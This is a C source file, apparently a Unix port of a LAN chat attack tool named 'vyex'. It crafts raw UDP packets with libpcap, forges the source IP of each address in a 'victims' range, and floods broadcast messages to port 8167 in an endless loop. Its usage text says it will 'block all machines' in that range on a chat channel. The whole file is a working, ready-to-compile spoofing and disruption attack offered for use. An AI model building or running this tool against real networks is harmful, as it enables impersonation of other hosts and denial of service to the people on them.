vyex: vyex.c
	gcc -lpcap vyex.c -o vyex

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h> 
#include <stdlib.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <signal.h>
#include <time.h> 
#include <pcap.h>

#define DWORD	unsigned long

#define LENHDRETH 14 
#define LENHDRIP 20 
#define LENHDRUDP 8 

#ifndef IP_HDRINCL
#define IP_HDRINCL      2 /* header is included with data */
#endif

typedef struct eth_hdr_struct
{
    unsigned char dst[6];
    unsigned char src[6];
    unsigned short ftype;
} eth_hdr;

typedef struct ip_header_struct
{ 
	unsigned char      version; 
	unsigned char      tos; 
	unsigned short int length; 
	unsigned short int id; 
	unsigned short int fragoff; 
	unsigned char      ttl; 
	unsigned char      protocol; 
	unsigned short int checksum; 
	unsigned long  int src; 
	unsigned long  int dest; 
} ip_header;

typedef struct udp_header_struct
{ 
	unsigned short int sport; 
	unsigned short int dport; 
	unsigned short int length; 
	unsigned short int checksum; 
} udp_header;

#define VYPORT 8167 

int msglen = 21;
//int sock; 
struct sockaddr_in remote_addr; 
unsigned char *msg; 
unsigned char *packet; 
unsigned long src,dst; 
int lenippacket; 
int interval; 
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE]={0};

unsigned short ip_checksum(unsigned short *buffer, int size)
{
    unsigned long cksum=0;
    while (size > 1){cksum += *buffer++;size  -= sizeof(unsigned short);   }
    if (size)cksum += *(unsigned char*)buffer;   
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16); 
    return (unsigned short)(~cksum); 
}

unsigned short udp_checksum( DWORD src_ip, DWORD dst_ip, udp_header *udp)
{
	unsigned long sum = 0;

	unsigned short len = udp->length;
	sum += src_ip >> 16;
	sum += src_ip & 0xffff;
	sum += dst_ip >> 16;
	sum += dst_ip & 0xffff;
	sum += IPPROTO_UDP << 8;
	sum += len;
	
	len = ntohs(len);
	unsigned short *s = (unsigned short *)udp;
	while (len > 1) 
	{
		sum += *s;
		s++;
		len -= 2;
	}
	if (len)
		sum += *(unsigned char *)s;

	sum  = (sum & 0xffff) + (sum >> 16);
	sum  = (sum & 0xffff) + (sum >> 16);
	
	return (unsigned short)(~sum);
}


unsigned char src_mac[6];// = {rand()%256,rand()%256,rand()%256,rand()%256,rand()%256,rand()%256};

int conn() 
{ 
	eth_hdr *ethh = (eth_hdr *) packet;
	ip_header *iph = (ip_header*) (packet+LENHDRETH);
	udp_header *udph = (udp_header*) (packet+LENHDRETH+LENHDRIP); 

    memset(ethh->dst,0xff,6);
	memcpy(ethh->src,src_mac,6);
	ethh->ftype = 0x0008;

	memset(iph,0,LENHDRIP);
	memset(udph,0,LENHDRUDP);

	iph->version=0x45; 
	iph->length=htons(lenippacket); 
	iph->id=htons(VYPORT); 
	iph->ttl=0xff; 
	iph->protocol=IPPROTO_UDP; 
	iph->src=src; 
	iph->dest=dst; 
	iph->checksum=0;	

	udph->sport=htons(VYPORT); 
	udph->dport=htons(VYPORT); 
	udph->length=htons(lenippacket-LENHDRIP); 
	udph->checksum=0; 
	
	iph->checksum = ip_checksum( (unsigned short *) iph, sizeof(ip_header));
	udph->checksum = udp_checksum( src, dst, udph);//!!!

	return 0; 
} 

int send_() 
{ 
	if (pcap_inject( adhandle, packet, sizeof(eth_hdr)+lenippacket) == -1) {
		fprintf( stderr, "Error sending the packet: '%s'\n", pcap_geterr(adhandle));
		return -1;
	}
	return 0;
} 

void usage() 
{ 
	printf("USAGE:    vyex ether_iface victims_ip_start victims_ip_end dest_ip [interval] [channel] [timeout]\n"); 
	printf("EXAMPLE1: vyex eth0 192.168.197.100 192.168.197.200 192.168.197.255\n"); 
	printf("EXAMPLE2: vyex eth0 192.168.197.100 192.168.197.200 255.255.255.255\n"); 
	printf("Will block all machines with IPs 192.168.197.100..192.168.197.200 on subnet 192.168.197.255 with default interval=100 msec and channel=#Main\n"); 
	printf("Note that sometimes broadcast 255.255.255.255 is works, but sometimes you should specify your subnet's broadcast address as destination\n"); 
	printf("vyex -l will list all existing interfaces\n\n"); 
	printf("vyex based on Vcban by beef. Have phun! beef7@yandex.ru\n");
	printf("Unix port by Keeper - nd_keeper@mail.ru\n");
} 

void check_priv() {
	if (geteuid() != 0) {
		printf( "You should have root priviledges.\n");
		exit(2);
	}
}

void devlist()
{
	pcap_if_t *alldevs, *dev;
	char errbuf[PCAP_ERRBUF_SIZE];
	
	check_priv();
	if (pcap_findalldevs( &alldevs, errbuf) != 0) {
		fprintf( stderr, "pcap_findalldevs(): %s\n", errbuf); 
		return;
	}
	printf( "%8s  %-15s\n", "iface", "IP-address");
	for (dev = alldevs; dev != NULL; dev = dev->next) {
		pcap_addr_t *addr;
		char *ip_addr = "NONE";
		for (addr = dev->addresses; addr != NULL; addr = addr->next) {
			struct sockaddr *dev_addr = addr->addr;
			if ((dev_addr != NULL) && (dev_addr->sa_family == PF_INET)) {
				ip_addr = (char*) inet_ntoa( ((struct sockaddr_in *) dev_addr)->sin_addr);
				break;
			}
		}
		printf( "%8s  %-15s\n", dev->name, ip_addr);
	}
	pcap_freealldevs( alldevs);
}

void sig_exit( int signal) {
	printf( "\nvyex terminated.\n");
	exit(0);
}


int main( int argc, char **argv) 
{ 
	printf("\nvyex started...\n"); 
	if ((argc == 2) && (strcmp( argv[1], "-l") == 0)) {
		printf( "Dumping local interfaces...\n");
		devlist();
		return 0;
	}
	char chan[256]={0};

	if (argc<5) {
		usage();
		return 0;
	}
	
	if (argc>5) {
		interval=atoi(argv[5]);
	} else {
		interval=100;
	}
	printf( "Interval set to %d milliseconds...\n",interval);

	if (argc>6) {
		strncpy(chan,argv[6],255);
	} else {
		strcpy(chan,"#Main");		
	}
	int chanlen = strlen(chan);
	printf( "Channel set to %s...\n",chan);
	
	if (argc>7) {
		int timeout = atoi( argv[7]);
		signal( SIGALRM, &sig_exit);
		alarm( timeout);
		printf( "Timeout set to %d seconds...\n", timeout);
	}
	
	check_priv();
	adhandle = pcap_open_live( argv[1], 65536, 0, 1000, errbuf);
	if (adhandle == NULL) {
		fprintf( stderr, "pcap_open_live(): %s\n", errbuf);
		return 1;
	}
	//pcap_setbuff (adhandle, 1024*1024);

	msglen = 16+chanlen;
	lenippacket=LENHDRIP+LENHDRUDP+msglen; 

	srand(time(NULL)); 
	packet = (unsigned char *) malloc(LENHDRETH+lenippacket); 
	DWORD src_first = inet_addr(argv[2]); //aton
	DWORD src_last  = inet_addr(argv[3]); //aton
	dst = inet_addr(argv[4]); //aton
	src_mac[0] = 1+(rand()%0xfe);
	src_mac[1] = 1+(rand()%0xfe);
	src_mac[2] = 1+(rand()%0xfe);
	src_mac[3] = 1+(rand()%0xfe);
	src_mac[4] = 1+(rand()%0xfe);
	src_mac[5] = 1+(rand()%0xfe);
	
	while (1) 
	{  
		printf("SENDING");
		fflush( stdout);
		for (src = src_first;;)
		{
			memset(packet, 0, lenippacket); 
			msg=packet+LENHDRETH+LENHDRIP+LENHDRUDP; 
			msg[0]='X'; 
			int x; 
			for(x=1;x!=10;x++)msg[x]=0x30+rand()%10; 
			msg[10]='2'; 
			
			strcpy((char*)msg+11,chan);//"#Main"); 
			memcpy(msg+11+chanlen,"\0/\0!\0",5);
			/*msg[11+chanlen]='\0'; 
			msg[11+chanlen+1]='/'; 
			msg[11+chanlen+2]='\0'; 
			msg[11+chanlen+3]='!'; 
			msg[11+chanlen+4]='\0'; */
			
			struct in_addr in;
			in.s_addr = src;
			printf(".");
			fflush( stdout);
			if (conn()  == -1) return -1; 
			if (send_() == -1) return -2;
			if (src==src_last) break;
			src = htonl(ntohl(src)+1);
			usleep( interval*1000); 
		}
		printf("Cycle OK!\n"); 
		//
	} 
	return 0;
}